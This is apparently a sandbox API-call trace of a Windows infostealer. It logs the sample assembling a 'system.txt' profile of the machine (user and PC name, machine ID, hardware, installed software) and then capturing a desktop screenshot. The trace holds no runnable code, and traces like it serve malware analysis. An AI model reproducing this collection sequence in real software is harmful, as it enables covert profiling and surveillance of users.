14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 12.0.21005" [0175.957] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 12.0.21005", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 12.0.21005\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 12.0.21005\n" [0175.957] RegCloseKey (hKey=0x354) returned 0x0 [0175.957] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x42, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0175.957] RegCloseKey (hKey=0x358) returned 0x0 [0175.957] lstrlenA (lpString="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 12.0.21005\n") returned 2948 [0175.957] lstrlenA (lpString="system.txt") returned 10 [0175.957] StrCmpCA (pszStr1=".txt", pszStr2=".Z") returned 26 [0175.957] StrCmpCA (pszStr1=".txt", pszStr2=".zip") returned -6 [0175.957] StrCmpCA (pszStr1=".txt", pszStr2=".zoo") returned -6 [0175.957] StrCmpCA (pszStr1=".txt", pszStr2=".arc") returned 19 [0175.957] StrCmpCA (pszStr1=".txt", pszStr2=".lzh") returned 8 [0175.957] StrCmpCA (pszStr1=".txt", pszStr2=".arj") returned 19 [0175.957] StrCmpCA (pszStr1=".txt", pszStr2=".gz") returned 13 [0175.957] StrCmpCA (pszStr1=".txt", pszStr2=".tgz") returned 17 [0175.957] GetLocalTime (in: lpSystemTime=0x19823c | out: lpSystemTime=0x19823c*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x3, wDay=0x3, wHour=0x13, wMinute=0x20, wSecond=0x27, wMilliseconds=0x22)) [0175.957] SystemTimeToFileTime (in: lpSystemTime=0x19823c, lpFileTime=0x198254 | out: lpFileTime=0x198254) returned 1 [0175.958] FileTimeToSystemTime (in: lpFileTime=0x198228, lpSystemTime=0x198210 | out: lpSystemTime=0x198210) returned 1 [0175.958] memcpy (in: _Dst=0x19877c, _Src=0x198650, _Size=0x9 | out: _Dst=0x19877c) returned 0x19877c [0175.959] memcpy (in: _Dst=0x1fa0000, _Src=0x198247, _Size=0x1 | out: _Dst=0x1fa0000) returned 0x1fa0000 [0175.959] memcpy (in: _Dst=0x1fa0001, _Src=0x198247, _Size=0x1 | out: _Dst=0x1fa0001) returned 0x1fa0001 [0175.959] memcpy (in: _Dst=0x1fa0002, _Src=0x198246, _Size=0x1 | out: _Dst=0x1fa0002) returned 0x1fa0002 [0175.959] memcpy (in: _Dst=0x1fa0003, _Src=0x198246, _Size=0x1 | out: _Dst=0x1fa0003) returned 0x1fa0003 [0175.959] memcpy (in: _Dst=0x1fa0004, _Src=0x198245, _Size=0x1 | out: _Dst=0x1fa0004) returned 0x1fa0004 [0175.959] memcpy (in: _Dst=0x1fa0005, _Src=0x198245, _Size=0x1 | out: _Dst=0x1fa0005) returned 0x1fa0005 [0175.959] memcpy (in: _Dst=0x1fa0006, _Src=0x198244, _Size=0x1 | out: _Dst=0x1fa0006) returned 0x1fa0006 [0175.959] memcpy (in: _Dst=0x1fa0007, _Src=0x198244, _Size=0x1 | out: _Dst=0x1fa0007) returned 0x1fa0007 [0175.959] memcpy (in: _Dst=0x1fa0008, _Src=0x198243, _Size=0x1 | out: _Dst=0x1fa0008) returned 0x1fa0008 [0175.959] memcpy (in: _Dst=0x1fa0009, _Src=0x198243, _Size=0x1 | out: _Dst=0x1fa0009) returned 0x1fa0009 [0175.959] memcpy (in: _Dst=0x1fa000a, _Src=0x198242, _Size=0x1 | out: _Dst=0x1fa000a) returned 0x1fa000a [0175.959] memcpy (in: _Dst=0x1fa000b, _Src=0x198242, _Size=0x1 | out: _Dst=0x1fa000b) returned 0x1fa000b [0175.960] memcpy (in: _Dst=0x1fa000c, _Src=0x198241, _Size=0x1 | out: _Dst=0x1fa000c) returned 0x1fa000c [0175.960] memcpy (in: _Dst=0x1fa000d, _Src=0x198241, _Size=0x1 | out: _Dst=0x1fa000d) returned 0x1fa000d [0175.960] memcpy (in: _Dst=0x1fa000e, _Src=0x198240, _Size=0x1 | out: _Dst=0x1fa000e) returned 0x1fa000e [0175.960] memcpy (in: _Dst=0x1fa000f, _Src=0x198240, _Size=0x1 | out: _Dst=0x1fa000f) returned 0x1fa000f [0175.960] memcpy (in: _Dst=0x1fa0010, _Src=0x19823f, _Size=0x1 | out: _Dst=0x1fa0010) returned 0x1fa0010 [0175.960] memcpy (in: _Dst=0x1fa0011, _Src=0x19823f, _Size=0x1 | out: _Dst=0x1fa0011) returned 0x1fa0011 [0175.960] memcpy (in: _Dst=0x1fa0012, _Src=0x19823e, _Size=0x1 | out: _Dst=0x1fa0012) returned 0x1fa0012 [0175.960] memcpy (in: _Dst=0x1fa0013, _Src=0x19823e, _Size=0x1 | out: _Dst=0x1fa0013) returned 0x1fa0013 [0175.960] memcpy (in: _Dst=0x1fa0014, _Src=0x19823d, _Size=0x1 | out: _Dst=0x1fa0014) returned 0x1fa0014 [0175.960] memcpy (in: _Dst=0x1fa0015, _Src=0x19823d, _Size=0x1 | out: _Dst=0x1fa0015) returned 0x1fa0015 [0175.960] memcpy (in: _Dst=0x1fa0016, _Src=0x19823c, _Size=0x1 | out: _Dst=0x1fa0016) returned 0x1fa0016 [0175.960] memcpy (in: _Dst=0x1fa0017, _Src=0x19823c, _Size=0x1 | out: _Dst=0x1fa0017) returned 0x1fa0017 [0175.960] memcpy (in: _Dst=0x1fa0018, _Src=0x19823b, _Size=0x1 | out: _Dst=0x1fa0018) returned 0x1fa0018 [0175.960] memcpy (in: _Dst=0x1fa0019, _Src=0x19823b, _Size=0x1 | out: _Dst=0x1fa0019) returned 0x1fa0019 [0175.960] memcpy (in: _Dst=0x1fa001a, _Src=0x19823a, _Size=0x1 | out: _Dst=0x1fa001a) returned 0x1fa001a [0175.960] memcpy (in: _Dst=0x1fa001b, _Src=0x19823a, _Size=0x1 | out: _Dst=0x1fa001b) returned 0x1fa001b [0175.960] memcpy (in: _Dst=0x1fa001c, _Src=0x198239, _Size=0x1 | out: _Dst=0x1fa001c) returned 0x1fa001c [0175.960] memcpy (in: _Dst=0x1fa001d, _Src=0x198239, _Size=0x1 | out: _Dst=0x1fa001d) returned 0x1fa001d [0175.960] memcpy (in: _Dst=0x1fa001e, _Src=0x198434, _Size=0xa | out: _Dst=0x1fa001e) returned 0x1fa001e [0175.960] memcpy (in: _Dst=0x1fa0028, _Src=0x198650, _Size=0x11 | out: _Dst=0x1fa0028) returned 0x1fa0028 [0175.960] GetTickCount () returned 0x150e32a [0175.960] GetDesktopWindow () returned 0x10010 [0175.961] GetProcessHeap () returned 0x4c0000 [0175.961] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x6afa8) returned 0x52b160 [0175.975] memcpy (in: _Dst=0x5460d0, _Src=0xec8e020, _Size=0xb84 | out: _Dst=0x5460d0) returned 0x5460d0 [0175.975] memcpy (in: _Dst=0x1fa0039, _Src=0x4d773c, _Size=0x392 | out: _Dst=0x1fa0039) returned 0x1fa0039 [0175.975] memcpy (in: _Dst=0x1fa0000, _Src=0x198247, _Size=0x1 | out: _Dst=0x1fa0000) returned 0x1fa0000 [0175.975] memcpy (in: _Dst=0x1fa0001, _Src=0x198247, _Size=0x1 | out: _Dst=0x1fa0001) returned 0x1fa0001 [0175.975] memcpy (in: _Dst=0x1fa0002, _Src=0x198246, _Size=0x1 | out: _Dst=0x1fa0002) returned 0x1fa0002 [0175.975] memcpy (in: _Dst=0x1fa0003, _Src=0x198246, _Size=0x1 | out: _Dst=0x1fa0003) returned 0x1fa0003 [0175.975] memcpy (in: _Dst=0x1fa0004, _Src=0x198245, _Size=0x1 | out: _Dst=0x1fa0004) returned 0x1fa0004 [0175.975] memcpy (in: _Dst=0x1fa0005, _Src=0x198245, _Size=0x1 | out: _Dst=0x1fa0005) returned 0x1fa0005 [0175.976] memcpy (in: _Dst=0x1fa0006, _Src=0x198244, _Size=0x1 | out: _Dst=0x1fa0006) returned 0x1fa0006 [0175.976] memcpy (in: _Dst=0x1fa0007, _Src=0x198244, _Size=0x1 | out: _Dst=0x1fa0007) returned 0x1fa0007 [0175.976] memcpy (in: _Dst=0x1fa0008, _Src=0x198243, _Size=0x1 | out: _Dst=0x1fa0008) returned 0x1fa0008 [0175.976] memcpy (in: _Dst=0x1fa0009, _Src=0x198243, _Size=0x1 | out: _Dst=0x1fa0009) returned 0x1fa0009 [0175.976] memcpy (in: _Dst=0x1fa000a, _Src=0x198242, _Size=0x1 | out: _Dst=0x1fa000a) returned 0x1fa000a [0175.976] memcpy (in: _Dst=0x1fa000b, _Src=0x198242, _Size=0x1 | out: _Dst=0x1fa000b) returned 0x1fa000b [0175.976] memcpy (in: _Dst=0x1fa000c, _Src=0x198241, _Size=0x1 | out: _Dst=0x1fa000c) returned 0x1fa000c [0175.976] memcpy (in: _Dst=0x1fa000d, _Src=0x198241, _Size=0x1 | out: _Dst=0x1fa000d) returned 0x1fa000d [0175.976] memcpy (in: _Dst=0x1fa000e, _Src=0x198240, _Size=0x1 | out: _Dst=0x1fa000e) returned 0x1fa000e [0175.976] memcpy (in: _Dst=0x1fa000f, _Src=0x198240, _Size=0x1 | out: _Dst=0x1fa000f) returned 0x1fa000f [0175.976] memcpy (in: _Dst=0x1fa0010, _Src=0x19823f, _Size=0x1 | out: _Dst=0x1fa0010) returned 0x1fa0010 [0175.976] memcpy (in: _Dst=0x1fa0011, _Src=0x19823f, _Size=0x1 | out: _Dst=0x1fa0011) returned 0x1fa0011 [0175.976] memcpy (in: _Dst=0x1fa0012, _Src=0x19823e, _Size=0x1 | out: _Dst=0x1fa0012) returned 0x1fa0012 [0175.976] memcpy (in: _Dst=0x1fa0013, _Src=0x19823e, _Size=0x1 | out: _Dst=0x1fa0013) returned 0x1fa0013 [0175.976] memcpy (in: _Dst=0x1fa0014, _Src=0x19823d, _Size=0x1 | out: _Dst=0x1fa0014) returned 0x1fa0014 [0175.976] memcpy (in: _Dst=0x1fa0015, _Src=0x19823d, _Size=0x1 | out: _Dst=0x1fa0015) returned 0x1fa0015 [0175.976] memcpy (in: _Dst=0x1fa0016, _Src=0x19823c, _Size=0x1 | out: _Dst=0x1fa0016) returned 0x1fa0016 [0175.976] memcpy (in: _Dst=0x1fa0017, _Src=0x19823c, _Size=0x1 | out: _Dst=0x1fa0017) returned 0x1fa0017 [0175.976] memcpy (in: _Dst=0x1fa0018, _Src=0x19823b, _Size=0x1 | out: _Dst=0x1fa0018) returned 0x1fa0018 [0175.976] memcpy (in: _Dst=0x1fa0019, _Src=0x19823b, _Size=0x1 | out: _Dst=0x1fa0019) returned 0x1fa0019 [0175.976] memcpy (in: _Dst=0x1fa001a, _Src=0x19823a, _Size=0x1 | out: _Dst=0x1fa001a) returned 0x1fa001a [0175.976] memcpy (in: _Dst=0x1fa001b, _Src=0x19823a, _Size=0x1 | out: _Dst=0x1fa001b) returned 0x1fa001b [0175.976] memcpy (in: _Dst=0x1fa001c, _Src=0x198239, _Size=0x1 | out: _Dst=0x1fa001c) returned 0x1fa001c [0175.976] memcpy (in: _Dst=0x1fa001d, _Src=0x198239, _Size=0x1 | out: _Dst=0x1fa001d) returned 0x1fa001d [0175.976] memcpy (in: _Dst=0x1fa001e, _Src=0x198434, _Size=0xa | out: _Dst=0x1fa001e) returned 0x1fa001e [0175.976] memcpy (in: _Dst=0x1fa0028, _Src=0x198650, _Size=0x11 | out: _Dst=0x1fa0028) returned 0x1fa0028 [0175.976] GetProcessHeap () returned 0x4c0000 [0175.976] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x9) returned 0x4f97a0 [0175.976] memcpy (in: _Dst=0x4f97a0, _Src=0x19877c, _Size=0x9 | out: _Dst=0x4f97a0) returned 0x4f97a0 [0175.976] GetProcessHeap () returned 0x4c0000 [0175.976] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x360) returned 0x528fa8 [0175.976] memcpy (in: _Dst=0x528fa8, _Src=0x1982ec, _Size=0x360 | out: _Dst=0x528fa8) returned 0x528fa8 [0175.976] GdiplusStartup (in: token=0x1987ec, input=0x1987d8, output=0x0 | out: token=0x1987ec, output=0x0) returned 0x0 [0176.090] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x1987e8 | out: ppstm=0x1987e8*=0x4ee208) returned 0x0 [0176.094] GetDesktopWindow () returned 0x10010 [0176.094] GetWindowRect (in: hWnd=0x10010, lpRect=0x1987bc | out: lpRect=0x1987bc) returned 1 [0176.097] GetDC (hWnd=0x10010) returned 0xa0100d0 [0176.097] CreateCompatibleDC (hdc=0xa0100d0) returned 0x3001099a [0176.097] CreateCompatibleBitmap (hdc=0xa0100d0, cx=1440, cy=900) returned 0x46050972 [0176.130] SelectObject (hdc=0x3001099a, h=0x46050972) returned 0x185000f [0176.130] BitBlt (hdc=0x3001099a, x=0, y=0, cx=1440, cy=900, hdcSrc=0xa0100d0, x1=0, y1=0, rop=0xcc0020) returned 1 [0176.595] GdipCreateBitmapFromHBITMAP (hbm=0x46050972, hpal=0x0, bitmap=0x1987b4) returned 0x0 [0176.764] GdipGetImageEncodersSize (numEncoders=0x198788, size=0x198784) returned 0x0 [0176.764] GetProcessHeap () returned 0x4c0000 [0176.764] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x410) returned 0x5296f0 [0176.765] GdipGetImageEncoders (in: numEncoders=0x5, size=0x410, encoders=0x5296f0 | out: encoders=0x5296f0) returned 0x0 [0176.767] GdipSaveImageToStream (image=0xee11f08, stream=0x4ee208, clsidEncoder=0x1987a0*(Data1=0x557cf401, Data2=0x1a04, Data3=0x11d3, Data4=([0]=0x9a, [1]=0x73, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x1e, [6]=0xf3, [7]=0x2e)), encoderParams=0x0) returned 0x0 [0177.179] GetHGlobalFromStream (in: pstm=0x4ee208, phglobal=0x1987b0 | out: phglobal=0x1987b0) returned 0x0 